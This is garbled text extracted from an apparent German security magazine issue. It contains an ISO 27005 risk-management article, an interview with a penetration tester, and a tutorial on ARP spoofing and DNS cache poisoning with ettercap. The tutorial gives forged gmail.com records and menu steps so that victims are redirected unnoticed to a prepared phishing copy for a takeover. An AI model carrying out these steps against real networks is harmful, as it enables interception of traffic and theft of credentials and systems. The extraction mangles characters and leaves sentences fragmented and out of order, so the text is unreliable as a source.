Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
